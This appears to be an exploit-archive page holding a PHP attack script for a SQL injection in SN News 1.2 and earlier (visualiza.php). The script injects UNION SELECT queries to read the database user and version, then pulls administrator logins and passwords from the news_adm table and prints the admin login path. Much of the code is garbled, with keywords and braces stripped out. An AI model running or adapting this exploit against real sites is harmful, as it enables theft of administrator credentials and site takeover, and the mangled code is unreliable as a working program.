LATEST EXPLOITS LIST CATEGORIES LIST TYPES LIST PORTS LIST PLATFORMS
SN News <= 1.2 - (visualiza.php) SQL Injection
<?php
/*
error_reporting ( E_ERROR );
set_time_limit ( 0 );
ini_set ( "default_socket_timeout" , 30 );
hex ( $string ){
$hex = '' ; // PHP 'Dim' =]
for ( $i = 0 ; $i < strlen ( $string ); $i ++){
$hex .= dechex ( ord ( $string [ $i ]));
'0x' . $hex ;
"\nSN News <= 1.2 SQL Injection exploit\n" ;
"Discovered and written by WhiteCollarGroup\n" ;
"www.wcgroup.host56.com - whitecollar_group@hotmail.com\n\n" ;
$argc != 2 ) {
"Usage: \n" ;
"php $argv [ 0 ] <target url>\n" ;
"Example:\n" ;
"php $argv [ 0 ] http://www.website.com/snnews\n" ;
$target = $argv [ 1 ];
substr ( $target , ( strlen ( $target )- 1 ))!= "/" ) {
$target .= "/" ;
$inject = $target . "visualiza.php?id=-0'%20" ;
$token = uniqid ();
$token_hex = hex ( $token );
"[*] Trying to get informations...\n" ;
$infos = file_get_contents ( $inject . urlencode ( "union all select 1,concat(" . $token_hex . ", user(), " . $token_hex . ", version(), " . $token_hex . "),3,4,5-- " ));
$infos_r = array();
preg_match_all ( "/ $token (.*) $token (.*) $token /" , $infos , $infos_r );
$user = $infos_r [ 1 ][ 0 ];
$version = $infos_r [ 2 ][ 0 ];
$user ) {
"[*] MySQL version: $version \n" ;
"[*] MySQL user: $user \n" ;
"[-] Error while getting informations.\n" ;
"[*] Getting users...\n" ;
$i = 0 ;
true ) {
$dados_r = array();
$dados = file_get_contents ( $inject . urlencode ( "union all select 1,concat(" . $token_hex . ", login, " . $token_hex . ", senha, " . $token_hex . "),3,4,5 from news_adm limit $i ,1-- " ));
preg_match_all ( "/ $token (.*) $token (.*) $token /" , $dados , $dados_r );
$login = $dados_r [ 1 ][ 0 ];
$senha = $dados_r [ 2 ][ 0 ];
$login ) AND ( $senha )) {
"-+-\n" ;
"User: $login \n" ;
"Pass: $senha \n" ;
$i ++;
"-+-+-\n" ;
$i != 0 ) {
"[!] Admin login: { $target } admin/\n" ;
"[-] Exploit failed. Make sure that's server is using a valid version of SN News without Apache mod_security.\nWe're sorry." ;
"\n" ;
